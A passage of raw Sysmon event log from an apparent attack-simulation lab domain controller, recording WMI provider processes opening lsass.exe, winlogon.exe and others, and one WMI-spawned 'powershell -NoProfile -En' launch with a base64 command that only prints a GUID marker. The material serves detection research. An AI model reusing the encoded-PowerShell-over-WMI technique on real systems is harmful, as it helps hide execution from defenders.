d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236509Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.840{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0E00-00000000AD01}1076C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236508Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.840{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0D00-00000000AD01}620C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236507Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.840{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0C00-00000000AD01}588C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236506Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.840{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236505Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.840{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0900-00000000AD01}792C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002236504Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.840{05ADC7E1-6D63-603E-6EAA-00000000AD01}5340ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_imikp3vk.avz.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002236503Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.840{05ADC7E1-6D63-603E-6EAA-00000000AD01}5340ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_4nla1pin.jib.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002236502Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.825{05ADC7E1-29F0-6039-C005-00000000AD01}49441064C:\Windows\system32\csrss.exe{05ADC7E1-6D63-603E-71AA-00000000AD01}8992C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002236501Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.825{05ADC7E1-29F0-6039-C005-00000000AD01}49443952C:\Windows\system32\csrss.exe{05ADC7E1-6D63-603E-70AA-00000000AD01}3652C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002236500Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.825{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236499Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.825{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236498Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.825{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236497Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.825{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236496Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.825{05ADC7E1-229D-6039-0500-00000000AD01}636652C:\Windows\system32\csrss.exe{05ADC7E1-6D63-603E-70AA-00000000AD01}3652C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002236495Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.825{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D63-603E-70AA-00000000AD01}3652C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\wbem\cimwin32.dll+3adce|C:\Windows\system32\wbem\cimwin32.dll+3d475|C:\Windows\system32\wbem\cimwin32.dll+3ab15|C:\Windows\system32\wbem\cimwin32.dll+3b393|C:\Windows\system32\wbem\cimwin32.dll+3bb40|C:\Windows\SYSTEM32\framedynos.dll+20256|C:\Windows\SYSTEM32\framedynos.dll+218b5|C:\Windows\system32\wbem\wmiprvse.exe+1704a|C:\Windows\system32\wbem\wmiprvse.exe+1724f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4 154100x80000000000000002236494Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.832{05ADC7E1-6D63-603E-70AA-00000000AD01}3652C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell.exe -NoProfile -En VwByAGkAdABlAC0ASABvAHMAdAAgAGQAZAA2ADAAYwAyAGUANAAtADQAZgBjADMALQA0ADAAYQA1AC0AYgAzADkAYwAtAGQAZQA2AGQAYwA2ADAAYgAwAGYAYwA3AA==C:\Windows\system32\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{05ADC7E1-6D63-603E-6BAA-00000000AD01}6344C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding 10341000x80000000000000002236493Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.809{05ADC7E1-229F-6039-1600-00000000AD01}154010492C:\Windows\system32\svchost.exe{05ADC7E1-6D63-603E-6CAA-00000000AD01}5176C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236492Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.809{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6D63-603E-6CAA-00000000AD01}5176C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 11241100x80000000000000002236491Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.809{05ADC7E1-6D63-603E-6EAA-00000000AD01}5340C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_4nla1pin.jib.ps12021-03-02 16:52:51.809 10341000x80000000000000002236490Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.793{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D63-603E-6FAA-00000000AD01}12376C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236489Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.793{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D63-603E-6EAA-00000000AD01}5340C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236488Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.793{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D63-603E-6DAA-00000000AD01}2536C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236487Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.793{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D63-603E-6CAA-00000000AD01}5176C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236486Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.793{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-6D63-603E-6EAA-00000000AD01}5340C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236485Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.793{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-35AA-00000000AD01}14828C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236484Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.793{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCR